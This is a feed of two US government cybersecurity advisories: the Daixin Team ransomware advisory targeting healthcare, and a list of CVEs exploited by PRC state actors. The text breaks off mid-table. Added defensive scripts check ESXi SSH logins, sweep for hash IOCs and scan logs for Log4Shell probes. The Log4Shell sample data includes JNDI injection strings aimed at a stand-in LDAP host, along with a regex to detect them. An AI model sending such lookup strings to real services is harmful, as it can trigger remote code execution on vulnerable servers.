
AA22-294A: #StopRansomware: Daixin Team


Original release date: October 21, 2022

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.

Download the PDF version of this report: pdf, 591 KB

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Cybercrime actors routinely target HPH Sector organizations with ransomware:

  • As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.
  • According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.

The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

  • Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
  • Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [T1190]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [T1078] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [T1598.002].

After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [T1563.001] and Remote Desktop Protocol (RDP) [T1563.002]. Daixin actors have sought to gain privileged account access through credential dumping [T1003] and pass the hash [T1550.002]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [T1098] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [T1486] on those servers. 
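The lateral movement described above ends with SSH sessions opened directly to ESXi hosts. One way a defender can catch that step is to compare accepted SSH logins in the ESXi authentication log against the short list of hosts that are allowed to administer the hypervisor. The script below is an added example, not code from the advisory: the log lines are constructed in the style of an ESXi /var/log/auth.log, and the allowlist address is a hypothetical jump host.

```python
import re

# Constructed sample lines in the style of an ESXi /var/log/auth.log.
# These are not taken from the advisory or from any real incident.
SAMPLE_AUTH_LOG = """\
2022-10-03T02:14:07Z sshd[2068001]: Accepted keyboard-interactive/pam for root from 10.20.0.15 port 50212 ssh2
2022-10-03T02:15:41Z sshd[2068010]: Accepted keyboard-interactive/pam for root from 10.99.7.203 port 41833 ssh2
2022-10-03T02:15:59Z sshd[2068012]: Failed password for root from 10.99.7.203 port 41840 ssh2
2022-10-03T09:30:00Z sshd[2068100]: Accepted publickey for root from 10.20.0.15 port 50980 ssh2
"""

# Hypothetical allowlist: the only addresses that should ever open an SSH
# session to an ESXi host (for example a hardened admin jump box).
ALLOWED_SSH_SOURCES = {"10.20.0.15"}

# Parses the "Accepted <method> for <user> from <ip> port <n> ssh2" event.
LOGIN_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)


def find_unexpected_esxi_logins(log_text, allowed_sources):
    """Return (timestamp, user, source, auth method) for every accepted SSH
    login whose source address is not on the allowlist. Failed attempts are
    ignored here; they belong in a separate brute-force rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        if m.group("src") not in allowed_sources:
            findings.append(
                (m.group("ts"), m.group("user"), m.group("src"), m.group("method"))
            )
    return findings


if __name__ == "__main__":
    for finding in find_unexpected_esxi_logins(SAMPLE_AUTH_LOG, ALLOWED_SSH_SOURCES):
        print("ALERT unexpected ESXi SSH login:", finding)
```

In practice the same check is worth running on vCenter's own audit trail as well, since the advisory reports the ESXi passwords being reset from vCenter before the SSH sessions were opened.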

According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. A ransom note is also written to /vmfs/volumes/. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. Figure 3 and Figure 4 include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”

Figure 1: Daixin Team – Ransomware Targeted File Path

Figure 2: Daixin Team – Ransomware Targeted File Extensions

Figure 3: Example 1 of Daixin Team Ransomware Note

Figure 4: Example 2 of Daixin Team Ransomware Note

In addition to deploying ransomware, Daixin actors have exfiltrated data [TA0010] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used Ngrok—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [T1567].

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 for all referenced threat actor tactics and techniques included in this advisory.

Table 1: Daixin Actors’ ATT&CK Techniques for Enterprise

Reconnaissance

Technique Title | ID | Use
Phishing for Information: Spearphishing Attachment | T1598.002 | Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.

Initial Access

Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.
Valid Accounts | T1078 | Daixin actors use previously compromised credentials to access servers on the target network.

Persistence

Technique Title | ID | Use
Account Manipulation | T1098 | Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.

Credential Access

Technique Title | ID | Use
OS Credential Dumping | T1003 | Daixin actors have sought to gain privileged account access through credential dumping.

Lateral Movement

Technique Title | ID | Use
Remote Service Session Hijacking: SSH Hijacking | T1563.001 | Daixin actors use SSH and RDP to move laterally across a network.
Remote Service Session Hijacking: RDP Hijacking | T1563.002 | Daixin actors use RDP to move laterally across a network.
Use Alternate Authentication Material: Pass the Hash | T1550.002 | Daixin actors have sought to gain privileged account access through pass the hash.

Exfiltration

Technique Title | ID | Use
Exfiltration Over Web Service | T1567 | Daixin Team members have used Ngrok for data exfiltration over web servers.

Impact

Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

INDICATORS OF COMPROMISE

See Table 2 for IOCs obtained from third-party reporting.

Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes

File | SHA256
rclone-v1.59.2-windows-amd64git-log.txt | 9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238
rclone-v1.59.2-windows-amd64rclone.1 | 19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD
rclone-v1.59.2-windows-amd64rclone.exe | 54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939
rclone-v1.59.2-windows-amd64README.html | EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF
rclone-v1.59.2-windows-amd64README.txt | 475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28
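Hash IOCs such as those in Table 2 are only useful if they are actually swept against file systems. The script below is an added example, not part of the advisory: it embeds the five SHA256 values from Table 2, hashes every file under a directory tree in fixed-size chunks (so large files do not have to fit in memory), and reports any match. The demo function builds a constructed temporary tree and registers the hash of one constructed file as an extra "known-bad" value, since the real Rclone binaries are not available to the example.

```python
import hashlib
import os
import tempfile

# SHA256 hashes from Table 2 of the advisory (Rclone files associated with
# Daixin activity), lowercased so comparisons are case-insensitive.
DAIXIN_RCLONE_SHA256 = {
    "9e42e07073e03bdea4cd978d9e7b44a9574972818593306be1f3dcfdee722238",
    "19ed36f063221e161d740651e6578d50e0d3cacee89d27a6ebed4ab4272585bd",
    "54e3b5a2521a84741dc15810e6fed9d739eb8083cb1fe097cb98b345af24e939",
    "ec16e2de3a55772f5dfac8bf8f5a365600fad40a244a574cbab987515aa40cbf",
    "475d6e80cf4ef70926a65df5551f59e35b71a0e92f0fe4dd28559a9deba60c28",
}


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream a file through SHA256 one chunk at a time and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree_for_iocs(root, ioc_hashes):
    """Walk `root` and return sorted [(path, sha256)] for every file whose
    digest appears in `ioc_hashes`. Unreadable files are skipped so one
    locked file does not abort the whole sweep."""
    wanted = {h.lower() for h in ioc_hashes}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_of_file(path)
            except OSError:
                continue
            if digest in wanted:
                hits.append((path, digest))
    return sorted(hits)


def demo():
    """Constructed demonstration: build a temporary tree, treat one constructed
    file's hash as an additional IOC, and return the relative paths that match."""
    with tempfile.TemporaryDirectory() as root:
        bad = os.path.join(root, "tools", "transfer.exe")
        os.makedirs(os.path.dirname(bad))
        with open(bad, "wb") as f:
            f.write(b"constructed sample content, not a real rclone binary")
        with open(os.path.join(root, "notes.txt"), "w") as f:
            f.write("benign file")
        iocs = DAIXIN_RCLONE_SHA256 | {sha256_of_file(bad)}
        hits = scan_tree_for_iocs(root, iocs)
        return [os.path.relpath(p, root).replace(os.sep, "/") for p, _ in hits]


if __name__ == "__main__":
    print(demo())
```

Matching on file hashes is brittle by nature; an attacker can rebuild Rclone and change every digest. Treat a hit as a high-confidence signal, but pair it with behavioural detections (an unexpected Rclone or Ngrok process, large outbound transfers to a single VPS) for the cases where the hashes do not match.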

Mitigations

FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:

  • Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).
  • Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
  • Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
  • Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, and to ensure data packets are not manipulated in transit by man-in-the-middle attacks.
  • Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
  • Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TLS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
  • Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
  • Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
  • Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
  • Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.

In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
    • Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
      • Refer to applicable state data breach laws and consult legal counsel when necessary.
      • For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
    • See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.

Mitigating and Preventing Ransomware

  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement allowlisting policies for applications and remote access that only allow systems to execute known and permitted programs.
  • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the National Institute of Standards and Technology’s (NIST’s) Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software.
  • Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Consider adding an email banner to messages coming from outside your organization.
  • Disable hyperlinks in received emails.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

  • Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • Follow the notification requirements as outlined in your cyber incident response plan.
  • Report incidents to the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

REFERENCES

  • Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
  • Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
  • No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
  • Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3.
  • For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov.

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at cisa.gov/report.

ACKNOWLEDGEMENTS

FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

  • Initial Publication: October 21, 2022


AA22-279A: Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors


Original release date: October 6, 2022

Summary

This joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People’s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.

This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

NSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage, FBI’s Industry Alerts, and NSA’s Cybersecurity Advisories & Guidance.

Download the PDF version of this report: pdf, 409 KB

Technical Details

NSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.

PRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.

Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020

Vendor | CVE | Vulnerability Type
Apache Log4j | CVE-2021-44228 | Remote Code Execution
Pulse Connect Secure | CVE-2019-11510 | Arbitrary File Read
GitLab CE/EE | CVE-2021-22205 | Remote Code Execution
Atlassian | CVE-2022-26134 | Remote Code Execution
Microsoft Exchange | CVE-2021-26855 | Remote Code Execution
F5 Big-IP | CVE-2020-5902 | Remote Code Execution
VMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload
Citrix ADC | CVE-2019-19781 | Path Traversal
Cisco Hyperflex | CVE-2021-1497 | Command Line Execution
Buffalo WSR | CVE-2021-20090 | Relative Path Traversal
Atlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution
Hikvision Webserver | CVE-2021-36260 | Command Injection
Sitecore XP | CVE-2021-42237 | Remote Code Execution
F5 Big-IP | CVE-2022-1388 | Remote Code Execution
Apache | CVE-2022-24112 | Authentication Bypass by Spoofing
ZOHO | CVE-2021-40539 | Remote Code Execution
Microsoft | CVE-2021-26857 | Remote Code Execution
Microsoft | CVE-2021-26858 | Remote Code Execution
Microsoft | CVE-2021-27065 | Remote Code Execution
Apache HTTP Server | CVE-2021-41773 | Path Traversal

These state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.

Mitigations

NSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.

  • Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.
  • Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. 
  • Block obsolete or unused protocols at the network edge. 
  • Upgrade or replace end-of-life devices.
  • Move toward the Zero Trust security model. 
  • Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.

Appendix A

Table II: Apache CVE-2021-44228

Apache CVE-2021-44228 CVSS 3.0: 10 (Critical)

Vulnerability Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
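Because the vulnerable behaviour is triggered by lookup strings that reach the logger from attacker-controlled input, web and application logs are the natural place to look for exploitation attempts after the fact. The script below is an added example, not part of the advisory: it scans constructed access-log lines (combined log format, invented addresses) for JNDI-style lookups in any field, URL-decoding first so that percent-encoded requests are not missed, and it also flags lookups whose prefix is itself assembled from nested `${...}` lookups, which a plain search for the literal `${jndi:` would overlook.

```python
import re
import urllib.parse

# Constructed access-log lines (combined log format). The addresses and
# requests are invented for this example and are not from the advisory.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:13:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:02:15 +0000] "GET /login?user=${jndi:ldap://192.0.2.10:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:02:20 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://192.0.2.10/x}"',
    '203.0.113.11 - - [10/Dec/2021:13:03:00 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.12 - - [10/Dec/2021:13:04:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Matches either a direct "${jndi:" lookup or a "${" whose body contains a
# nested "${" before the closing brace (a lookup built out of other lookups).
# An ordinary single lookup such as "${version}" does not match.
JNDI_RE = re.compile(r"\$\{\s*(?:jndi\s*:|[^}]*\$\{)", re.IGNORECASE)


def url_decode_fully(text, rounds=3):
    """URL-decode up to `rounds` times so single- or double-encoded payloads
    become visible; stops early once decoding no longer changes the text."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(lines):
    """Return [(client_ip, matched_text)] for every log line carrying a
    JNDI-style lookup anywhere in it (request line, referrer, user agent...)."""
    hits = []
    for line in lines:
        m = JNDI_RE.search(url_decode_fully(line))
        if m:
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, m.group(0)))
    return hits


if __name__ == "__main__":
    for client_ip, matched in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"ALERT possible Log4Shell probe from {client_ip}: {matched!r}")
```

A hit in the access log shows that a lookup string reached the server, not that it was logged by a vulnerable Log4j instance; confirm exposure by checking which log4j-core version the application actually loads, and treat outbound LDAP or similar connections from the application host around the same timestamp as the stronger indicator.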

Recommended Mitigations

  • Apply patches provided by vendor and perform required system updates.

Detection Methods

Vulnerable Technologies and Versions

There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check https://nvd.nist.gov/vuln/detail/CVE-2021-44228.

Table III: Pulse CVE-2019-11510

Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical)

Vulnerability Description

This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file read.

Recommended Mitigations

  • Apply patches provided by vendor and perform required system updates.

Detection Methods

  • Use CISA’s “Check Your Pulse” Tool.

Vulnerable Technologies and Versions

Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

Table IV: GitLab CVE-2021-22205

GitLab CVE-2021-22205 CVSS 3.0: 10 (Critical)

Vulnerability Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution.

Recommended Mitigations

  • Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.
  • Hotpatch is available via GitLab.

Detection Methods

  • Investigate logfiles.
  • Check GitLab Workhorse.

Vulnerable Technologies and Versions

Gitlab CE/EE.

Table V: Atlassian CVE-2022-26134

Atlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1.

Recommended Mitigations 

  • Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. 
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.
  • Short term workaround is provided here.

Detection Methods

N/A

Vulnerable Technologies and Versions

All supported versions of Confluence Server and Data Center

Confluence Server and Data Center versions after 1.3.0

Table VI: Microsoft CVE-2021-26855

Microsoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Microsoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity.

Recommended Mitigations

  • Apply the appropriate Microsoft Security Update:
    • Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)
    • Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)
    • Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)
    • Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)
    • Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)
  • Restrict untrusted connections.

Detection Methods

  • Analyze Exchange product logs for evidence of exploitation.
  • Scan for known webshells.

Vulnerable Technologies and Versions

Microsoft Exchange 2013, 2016, and 2019.

Table VII: F5 CVE-2020-5902

F5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Recommended Mitigations

  • Apply F5 BIG-IP Update.
  • Restrict access to the configuration utility.

Detection Methods

Vulnerable Technologies and Versions

F5 Big-IP Access Policy Manager

F5 Big-IP Advanced Firewall Manager

F5 Big-IP Advanced Web Application Firewall

F5 Big-IP Analytics

F5 Big-IP Application Acceleration Manager

F5 Big-IP Application Security Manager

F5 Big-IP Ddos Hybrid Defender

F5 Big-IP Domain Name System (DNS)

F5 Big-IP Fraud Protection Service (FPS)

F5 Big-IP Global Traffic Manager (GTM)

F5 Big-IP Link Controller

F5 Networks Big-IP Local Traffic Manager (LTM)

F5 Big-IP Policy Enforcement Manager (PEM)

F5 SSL Orchestrator

References

https://support.f5.com/csp/article/K00091341

https://support.f5.com/csp/article/K07051153

https://support.f5.com/csp/article/K20346072

https://support.f5.com/csp/article/K31301245

https://support.f5.com/csp/article/K33023560

https://support.f5.com/csp/article/K43638305

https://support.f5.com/csp/article/K52145254

https://support.f5.com/csp/article/K82518062

Table VIII: VMware CVE-2021-22005

VMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.

Recommended Mitigations

  • Apply Vendor Updates.

Detection Methods

N/A

Vulnerable Technologies and Versions

VMware Cloud Foundation

VMware VCenter Server

Table IX: Citrix CVE-2019-19781

Citrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

